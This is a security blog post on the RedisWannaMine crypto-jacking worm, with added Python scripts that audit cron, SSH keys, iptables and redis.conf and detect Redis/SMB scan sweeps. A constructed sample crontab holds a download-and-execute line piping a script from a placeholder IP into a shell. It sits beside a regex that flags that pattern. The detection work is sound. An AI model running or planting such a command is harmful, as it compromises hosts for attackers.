Secplicity - Security Simplified

Powered by WatchGuard Technologies

Crypto-jacking Is Getting Crazier by the Minute

March 16, 2018 By Abdi Hagi

Cryptocurrency

Last week, Imperva discovered a new crypto-jacking attack, which they named RedisWannaMine. According to Imperva, the malware's initial attack vector was a well-known web application vulnerability in Apache Struts, and the campaign hit both database servers and application servers. Imperva, however, does not reveal the scope of the campaign or the number of systems that were exploited. Imperva noted that most crypto-jacking attacks seen so far have been limited in complexity, but this one uses a more sophisticated downloader: it is more capable, it employs more evasion techniques, and it shows worm-like behavior, spreading with the EternalBlue SMB exploit (leaked from the NSA) alongside other exploits.

Imperva found several scripts associated with RedisWannaMine. One shell script, transfer.sh, is a downloader that in some ways resembles older crypto-jacking downloaders. The script establishes persistence on the infected host through a new crontab entry, keeps remote access by adding an SSH key to "/root/.ssh/authorized_keys", and adds new rules to the host's iptables firewall.
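Those three persistence artifacts (a download-and-execute cron job, a foreign SSH key, a firewall rule that opens a port to the world) are exactly what an incident responder checks first on a suspected host. The script below is an added example written for this article, not Imperva's tooling or anything recovered from the malware; it audits the text of a root crontab, an authorized_keys file and `iptables -S` output, and the sample inputs it runs on are constructed (the key material is placeholder text and the IP in the cron line is a documentation address).

```python
"""Audit crontab, /root/.ssh/authorized_keys and iptables rules for the kind of
persistence RedisWannaMine's downloader is described as adding.  Example code
written for this article; the sample inputs are constructed."""
import re
from typing import List, Set

# A cron job that fetches remote content and pipes it straight into a shell,
# or decodes embedded base64, is the classic crypto-jacker persistence pattern.
CRON_SUSPICIOUS_RE = re.compile(
    r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b|\bbase64\s+(-d|--decode)\b")

# Ports the RedisWannaMine downloader is reported to open and scan for.
WATCHED_PORTS = {"6379", "445"}


def audit_crontab(crontab: str) -> List[str]:
    """Flag crontab lines that download-and-execute."""
    findings = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if CRON_SUSPICIOUS_RE.search(line):
            findings.append(f"crontab: download-and-execute entry: {line}")
    return findings


def audit_authorized_keys(keys_file: str, allowlist: Set[str]) -> List[str]:
    """Flag any key whose key material is not in the set of keys the team issued."""
    findings = []
    for line in keys_file.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        # Option-prefixed lines ("command=... ssh-rsa AAAA...") put the type later.
        idx = next((i for i, p in enumerate(parts)
                    if p.startswith(("ssh-", "ecdsa-"))), None)
        if idx is None or idx + 1 >= len(parts):
            continue
        key_type, key_data = parts[idx], parts[idx + 1]
        comment = " ".join(parts[idx + 2:]) or "(no comment)"
        if key_data not in allowlist:
            findings.append(f"authorized_keys: unexpected {key_type} key {comment}")
    return findings


def audit_iptables(rules: str) -> List[str]:
    """Flag INPUT ACCEPT rules (from `iptables -S`) that expose a watched port
    to any source, or that accept all traffic without interface/proto/source."""
    findings = []
    for line in rules.splitlines():
        tokens = line.split()
        if tokens[:2] != ["-A", "INPUT"] or "ACCEPT" not in tokens:
            continue
        has_source = "-s" in tokens
        m = re.search(r"--dport\s+(\d+)", line)
        if m and m.group(1) in WATCHED_PORTS and not has_source:
            findings.append(f"iptables: port {m.group(1)} accepted from any source: {line}")
        elif not m and not has_source and "-p" not in tokens and "-i" not in tokens:
            findings.append(f"iptables: blanket INPUT accept: {line}")
    return findings


def audit_host(crontab: str, keys_file: str, rules: str, allowlist: Set[str]) -> List[str]:
    """Run all three checks and return the combined findings."""
    return (audit_crontab(crontab)
            + audit_authorized_keys(keys_file, allowlist)
            + audit_iptables(rules))


# Constructed sample inputs (not real malware artifacts).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/10 * * * * curl -fsSL http://192.0.2.10/transfer.sh | sh
"""
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleIssuedKey000000000000000000000 ops@bastion
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleUnknownKey111111111111111111 root@unknown
"""
SAMPLE_IPTABLES = """\
-P INPUT DROP
-A INPUT -i lo -j ACCEPT
-A INPUT -s 10.0.0.0/8 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 6379 -j ACCEPT
"""
ISSUED_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIExampleIssuedKey000000000000000000000"}

if __name__ == "__main__":
    for finding in audit_host(SAMPLE_CRONTAB, SAMPLE_AUTHORIZED_KEYS,
                              SAMPLE_IPTABLES, ISSUED_KEYS):
        print(finding)
```

On a live host, feed it `crontab -l -u root`, the contents of `/root/.ssh/authorized_keys` and `iptables -S`; the allowlist should come from your configuration management, not from the host being audited, since an attacker with root can edit both the keys file and any local record of "known" keys.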

This downloader has many improvements over earlier crypto-jacker downloaders, though. For example, it is self-sufficient: it can install the packages it needs using standard Linux package managers such as APT and YUM. The script also downloads masscan, a publicly available TCP port scanner, from its GitHub repository, then compiles and installs it on the infected host. Per the GitHub project's documentation, masscan is "the fastest Internet port scanner tool. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second."

According to the research, once the malware is settled on the host, the script launches another process that uses masscan to discover and infect reachable Redis servers. It scans for TCP port 6379 on both public and private IP ranges. For any address that answers on that port, the script launches 'redisrun.sh' to infect the new host with the same crypto-mining malware, and the cycle repeats.

RedisWannaMine also uses the EternalBlue SMB exploit against vulnerable Windows servers. The malware launches another scan process, 'ebscan.sh', that again uses masscan, this time for TCP port 445 on both private and public IPs, to discover and infect reachable Windows servers running vulnerable SMB versions.
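The propagation behavior described in the last two paragraphs has a distinctive network signature: a single internal host suddenly touching dozens of distinct addresses on 6379 or 445 within seconds, which no application server does in normal operation. The following is an added detection example written for this article, not Imperva's or any vendor's tooling. It assumes a simple connection log of one line per flow in the form `<ISO-8601 time> <src> <dst> <dport>` (an assumption; adapt the parser to your flow or firewall export), and the threshold, window and sample records are constructed.

```python
"""Spot worm-style sweeps of Redis (TCP/6379) and SMB (TCP/445) in connection
logs.  Example detection logic written for this article; the log format,
thresholds and sample records are assumptions/constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

SCAN_PORTS = {6379, 445}          # ports RedisWannaMine is reported to sweep
DISTINCT_HOSTS_THRESHOLD = 20     # distinct destinations per source per window
WINDOW = timedelta(seconds=60)    # sliding window length

Event = Tuple[datetime, str, str, int]   # (timestamp, src, dst, dport)


def parse_line(line: str) -> Event:
    """Assumed log format: '<ISO-8601 time> <src> <dst> <dport>' per line."""
    ts, src, dst, dport = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport)


def detect_scanners(lines: List[str],
                    threshold: int = DISTINCT_HOSTS_THRESHOLD,
                    window: timedelta = WINDOW) -> Dict[Tuple[str, int], int]:
    """Return {(src, dport): peak_distinct_destinations} for every source that
    reached at least `threshold` distinct hosts on a watched port inside any
    sliding window of length `window`.  Counting distinct destinations rather
    than raw connections keeps a busy client of one Redis instance quiet."""
    by_key: Dict[Tuple[str, int], List[Tuple[datetime, str]]] = defaultdict(list)
    for line in lines:
        ts, src, dst, dport = parse_line(line)
        if dport in SCAN_PORTS:
            by_key[(src, dport)].append((ts, dst))

    alerts: Dict[Tuple[str, int], int] = {}
    for key, events in by_key.items():
        events.sort()                       # chronological; later ones are >= start
        peak = 0
        for i, (start, _) in enumerate(events):
            seen = {dst for ts, dst in events[i:] if ts - start < window}
            peak = max(peak, len(seen))
        if peak >= threshold:
            alerts[key] = peak
    return alerts


def _constructed_log() -> List[str]:
    """Constructed sample: one benign app server and one sweeping host."""
    base = datetime(2018, 3, 8, 10, 0, 0)
    lines = []
    # Benign: an app server talking to its single Redis instance every 30 s.
    for i in range(10):
        t = base + timedelta(seconds=30 * i)
        lines.append(f"{t.isoformat()} 10.0.1.9 10.0.2.1 6379")
    # Sweep: one host hitting 60 addresses on 6379 and 30 on 445 within seconds.
    for i in range(60):
        t = base + timedelta(milliseconds=100 * i)
        lines.append(f"{t.isoformat()} 10.0.1.5 10.0.3.{i + 1} 6379")
    for i in range(30):
        t = base + timedelta(seconds=5, milliseconds=100 * i)
        lines.append(f"{t.isoformat()} 10.0.1.5 10.0.4.{i + 1} 445")
    return lines


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for (src, port), count in sorted(detect_scanners(SAMPLE_LOG).items()):
        print(f"ALERT {src} reached {count} distinct hosts on tcp/{port} within {WINDOW}")
```

The window-based count is deliberately simple; masscan at full rate would trip it in well under a second, while a patch-management or monitoring host that legitimately polls many machines can be excluded by source address rather than by raising the threshold.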

According to the Imperva blog post, the final payload is a well-known crypto-miner that mines cryptocurrency and sends the proceeds to the attacker's wallet.

How do you prevent RedisWannaMine?

There are several ways to keep RedisWannaMine off your servers. At a minimum, install system updates and patch applications, including Apache Struts, with the latest security fixes. Disabling obsolete protocols such as SMBv1 on your network and using firewalls to restrict access, so that services like Redis are never exposed to the Internet, goes a long way too. For more information on this particular attack, see Imperva's blog post. –Abdi Hagi
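Beyond the firewall, the Redis instance itself should not be willing to talk to an anonymous scanner that does reach port 6379. The script below is an added example written for this article, not Redis's own tooling or anything from the Imperva research. It reads a `redis.conf` and reports the settings that leave an instance open to exactly this kind of sweep, shown against a constructed weak configuration and a constructed hardened one (the password in the hardened sample is a placeholder).

```python
"""Audit a redis.conf for settings that leave Redis open to an unauthenticated
sweep of TCP/6379.  Example code written for this article; both sample configs
are constructed and the password is a placeholder."""
import shlex
from typing import Dict, List

MIN_PASSWORD_LEN = 16   # assumed policy; Redis auth is fast, so long passwords matter


def parse_redis_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive (lower-cased) to every argument list it appears with.
    redis.conf is one 'directive arg ...' per line, '#' comments, quoted args,
    and some directives (rename-command) may legitimately repeat."""
    conf: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text: str) -> List[str]:
    """Return a list of findings; an empty list means the checks all passed."""
    conf = parse_redis_conf(text)
    findings: List[str] = []

    # 1. Listening address: no bind, or a wildcard, means every interface.
    binds = [addr for args in conf.get("bind", []) for addr in args]
    if not binds or any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind: listens on all interfaces; bind to loopback or an internal address")

    # 2. protected-mode refuses external clients when no password is set.
    #    Older Redis has no such mode, so treat 'absent' the same as 'no'.
    if conf.get("protected-mode", [[]])[-1] != ["yes"]:
        findings.append("protected-mode: not set to yes (absent or disabled)")

    # 3. Authentication: absent, empty or short password.
    password = conf.get("requirepass", [[]])[-1]
    if not password or len(password[0]) < MIN_PASSWORD_LEN:
        findings.append(f"requirepass: missing or shorter than {MIN_PASSWORD_LEN} characters")

    # 4. CONFIG lets any connected client change dir/dbfilename and make the
    #    server write to disk; rename it (or disable it with "") in production.
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("rename-command: CONFIG is reachable under its default name")

    return findings


# Constructed sample configs.
WEAK_CONF = """\
# Typical 'just make it work' config that RedisWannaMine-style sweeps look for
bind 0.0.0.0
port 6379
protected-mode no
"""

HARDENED_CONF = """\
bind 127.0.0.1 10.0.0.5
port 6379
protected-mode yes
# placeholder; generate a real secret and keep it out of version control
requirepass PLACEHOLDER-replace-with-32-random-chars
rename-command CONFIG ""
rename-command FLUSHALL ""
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}] {len(audit_redis_conf(conf))} finding(s)")
        for f in audit_redis_conf(conf):
            print("  -", f)
```

Run it against `/etc/redis/redis.conf` on each Redis host; pair it with a perimeter rule that drops inbound 6379 and 445 from outside your network. On the Windows side, SMBv1 can be switched off on Windows 8 / Server 2012 and later with `Set-SmbServerConfiguration -EnableSMB1Protocol $false`, which removes the protocol version EternalBlue targets.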

Filed Under: Editorial Articles Tagged With: Hacking, Infosec news
